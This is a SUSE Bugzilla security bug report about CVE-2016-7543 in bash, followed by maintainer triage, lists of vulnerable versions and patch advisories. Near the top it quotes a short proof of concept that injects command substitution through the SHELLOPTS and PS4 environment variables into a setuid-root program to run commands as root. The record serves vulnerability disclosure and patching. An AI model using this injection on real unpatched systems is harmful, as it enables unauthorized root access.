Bugzilla – Bug 1001299
VUL-1: CVE-2016-7543: bash SHELLOPTS+PS4
Last modified: 2020-06-13 00:55:53 UTC
Reference: http://seclists.org/oss-sec/2016/q3/617 =================== The recent bash 4.4 patched an old attack vector regarding specially crafted SHELLOPTS+PS4 environment variables against bogus setuid binaries using system()/popen(). https://lists.gnu.org/archive/html/bug-bash/2016-09/msg00018.html "nn. Shells running as root no longer inherit PS4 from the environment, closing a security hole involving PS4 expansion performing command substitution." # gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }' # chmod 4755 ./test # ls -l ./test -rwsr-xr-x. 1 root root 8549 Sep 10 18:06 ./test # exit $ env -i SHELLOPTS=xtrace PS4='$(id)' ./test uid=0(root) Sat Sep 10 18:06:36 WET 2016 Sorry Tavis :P ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program. =================== I've tried to reproduce this issue on release bash version in 42.1 -- 4.2.47(1)-release (x86_64-suse-linux-gnu) -- but first line (gcc -xc...) returned command line dialogue instead of test-file. So, please, try to reproduce this on your own side this issue. Thanks!
bugbot adjusting priority
Why it this VUL-0 for the personal environment of root? PS4 is used for debugging by tracing, e.g. "bash -x" ... or with "set -x"
Agreed, don't see it as VUL-0 either. Can't reproduce on Leap 42.1, it just shows me my id
(In reply to Dr. Werner Fink from comment #2) > Why it this VUL-0 for the personal environment of root? PS4 is used for > debugging by tracing, e.g. "bash -x" ... or with "set -x" OK, let me know when VUL-0, VUL-1... are used, because I report "as is" and "Incidents" section is not available to me. :( Thanks!
http://www.securityfocus.com/bid/93183 Vulnerable: ================== GNU GNU bash 3.1.4 GNU GNU bash 3.0.16 GNU GNU bash 2.3 GNU GNU bash 2.2.1 GNU GNU bash 2.2 GNU GNU bash 2.1 GNU GNU bash 2.0 GNU GNU bash 1.14.5 GNU GNU bash 1.14.3 GNU GNU bash 1.14.2 GNU GNU bash 1.14.1 GNU GNU bash 1.14 GNU GNU bash 4.3 GNU GNU bash 4.2 GNU GNU bash 4.1 GNU GNU bash 4.0 GNU GNU bash 3.2.48 GNU GNU bash 3.2 GNU GNU bash 2.05 GNU GNU bash 2.04 GNU GNU bash 2.03 GNU GNU bash 2.02 GNU GNU bash 2.01.1 GNU GNU bash 2.01 GNU GNU bash 1.14.7 GNU GNU bash 1.14.6 GNU GNU bash 1.14.4 ================== Not Vulnerable: GNU GNU bash 4.4
From http://seclists.org/oss-sec/2016/q4/80 -- http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-047
(In reply to Mikhail Kasimov from comment #8) bash43-048 you mean ... bash43-047 is for bug #1000396
(In reply to Dr. Werner Fink from comment #9) > (In reply to Mikhail Kasimov from comment #8) > > bash43-048 you mean ... bash43-047 is for bug #1000396 Yes, seems https://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-048 Sorry for confusing.
This is an autogenerated message for OBS integration: This bug (1001299) was mentioned in https://build.opensuse.org/request/show/437124 13.2 / bash
openSUSE-SU-2016:2715-1: An update that solves two vulnerabilities and has one errata is now available. Category: security (moderate) Bug References: 1000396,1001299,976776 CVE References: CVE-2016-0634,CVE-2016-7543 Sources used: openSUSE 13.2 (src): bash-4.2-75.5.1
Fixed from the POV of the maintainer. If anyone has an other POV repopen *and* reassign
SUSE-SU-2016:2872-1: An update that solves four vulnerabilities and has one errata is now available. Category: security (moderate) Bug References: 1000396,1001299,1001759,898812,898884 CVE References: CVE-2014-6277,CVE-2014-6278,CVE-2016-0634,CVE-2016-7543 Sources used: SUSE Linux Enterprise Workstation Extension 12-SP1 (src): bash-4.2-82.1 SUSE Linux Enterprise Software Development Kit 12-SP1 (src): bash-4.2-82.1 SUSE Linux Enterprise Server 12-SP1 (src): bash-4.2-82.1 SUSE Linux Enterprise Desktop 12-SP1 (src): bash-4.2-82.1
openSUSE-SU-2016:2961-1: An update that solves four vulnerabilities and has one errata is now available. Category: security (moderate) Bug References: 1000396,1001299,1001759,898812,898884 CVE References: CVE-2014-6277,CVE-2014-6278,CVE-2016-0634,CVE-2016-7543 Sources used: openSUSE Leap 42.1 (src): bash-4.2-81.1
SUSE-SU-2017:0302-1: An update that solves two vulnerabilities and has two fixes is now available. Category: security (moderate) Bug References: 1000396,1001299,959755,971410 CVE References: CVE-2016-0634,CVE-2016-7543 Sources used: SUSE Linux Enterprise Software Development Kit 11-SP4 (src): bash-3.2-147.29.1 SUSE Linux Enterprise Server 11-SP4 (src): bash-3.2-147.29.1 SUSE Linux Enterprise Debuginfo 11-SP4 (src): bash-3.2-147.29.1
SUSE-SU-2018:1398-1: An update that solves two vulnerabilities and has one errata is now available. Category: security (moderate) Bug References: 1000396,1001299,1086247 CVE References: CVE-2016-0634,CVE-2016-7543 Sources used: SUSE OpenStack Cloud 7 (src): bash-4.3-83.10.1 SUSE Linux Enterprise Workstation Extension 12-SP3 (src): bash-4.3-83.10.1 SUSE Linux Enterprise Software Development Kit 12-SP3 (src): bash-4.3-83.10.1 SUSE Linux Enterprise Server for SAP 12-SP2 (src): bash-4.3-83.10.1 SUSE Linux Enterprise Server 12-SP3 (src): bash-4.3-83.10.1 SUSE Linux Enterprise Server 12-SP2-LTSS (src): bash-4.3-83.10.1 SUSE Linux Enterprise Desktop 12-SP3 (src): bash-4.3-83.10.1 SUSE Enterprise Storage 4 (src): bash-4.3-83.10.1 SUSE CaaS Platform ALL (src): bash-4.3-83.10.1 OpenStack Cloud Magnum Orchestration 7 (src): bash-4.3-83.10.1
openSUSE-SU-2018:1419-1: An update that solves two vulnerabilities and has one errata is now available. Category: security (moderate) Bug References: 1000396,1001299,1086247 CVE References: CVE-2016-0634,CVE-2016-7543 Sources used: openSUSE Leap 42.3 (src): bash-4.3-83.6.1
Update out there
SUSE-SU-2018:1398-2: An update that solves two vulnerabilities and has one errata is now available. Category: security (moderate) Bug References: 1000396,1001299,1086247 CVE References: CVE-2016-0634,CVE-2016-7543 Sources used: SUSE Linux Enterprise Server 12-SP2-BCL (src): bash-4.3-83.10.1